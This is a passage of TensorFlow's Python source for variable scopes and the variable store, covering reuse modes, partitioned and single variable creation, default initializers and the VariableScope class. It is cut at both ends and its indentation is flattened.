"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
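# Worked example (comment only, not part of the original source): a variable
# with full_shape=[10, 10] split along axis 1 might give one shard
# _PartitionInfo(full_shape=[10, 10], var_offset=[0, 3]).  For a partition of
# shape [10, 4], single_slice_dim([10, 4]) returns 1 (axis 0 is unsplit) and
# single_offset([10, 4]) returns 3, the offset along the partitioned axis.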
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = False
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Set trainable value based on synchronization value.
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
reuse_without_partition = reuse and not partitioner
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if not reuse_without_partition:
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable (%s) must be "
"fully defined, but instead was %s." % (name, shape))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
partitions = partitioner(shape=shape, dtype=dtype)
if not isinstance(partitions, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% partitions)
if len(partitions) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (partitions, shape))
if any(p < 1 for p in partitions):
raise ValueError(
"Partitioner returned zero or negative partitions for some axes: %s" %
partitions)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (not reuse_without_partition and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, slice_shape = _compute_slice_dim_and_shape(
shape.as_list(), partitions)
vs = []
num_slices = partitions[slice_dim]
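# The partitioned axis is split into num_slices shards; when its size is not a
# multiple of num_slices, the first (size mod num_slices) shards each get one
# extra element (see the var_shape adjustment in the loop below).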
num_slices_with_excess = shape[slice_dim].value % num_slices
slice_offset = [0] * shape.ndims
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
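# Create one sub-variable per shard, tracking each shard's offset within the
# full variable so it can be initialized and saved as a slice.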
for i in xrange(num_slices):
var_shape = slice_shape[:]
var_offset = slice_offset[:]
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
if i < num_slices_with_excess:
var_shape[slice_dim] += 1
slice_offset[slice_dim] += var_shape[slice_dim]
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
# pylint: disable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
# pylint: enable=protected-access
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
tb = self._vars[name].op.traceback[::-1]
# Throw away internal tf entries and only take a few lines.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
raise ValueError("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope? "
"Originally defined at:\n\n%s" % (
name, "".join(traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
if shape and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
elif not tf_inspect.getargspec(initializer).args:
init_val = initializer
else:
raise ValueError("You can only pass an initializer function that "
"expects no arguments to its callable when the "
"shape is not fully defined. The given initializer "
"function expects the following args %s" %
tf_inspect.getargspec(initializer).args)
variable_dtype = dtype.base_dtype
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a glorot uniform initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT/DT_BOOL/DT_STRING, provide a default value `zero`
# (`False` for bool, an empty string for string)
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTE: should complex dtypes (DT_COMPLEX) also get a default initializer here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
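A hedged sketch of how these defaults flow into `get_variable` (the scope and
variable names here are only illustrative):
```python
init = tf.zeros_initializer()
with tf.variable_scope("dense", initializer=init, dtype=tf.float64):
  w = tf.get_variable("w", shape=[3])  # picks up the scope's initializer/dtype
```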
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be tf.AUTO_REUSE.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
if self._partitioner is not None:
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
if partitioner and context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets an existing variable with this name or create a new one."""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
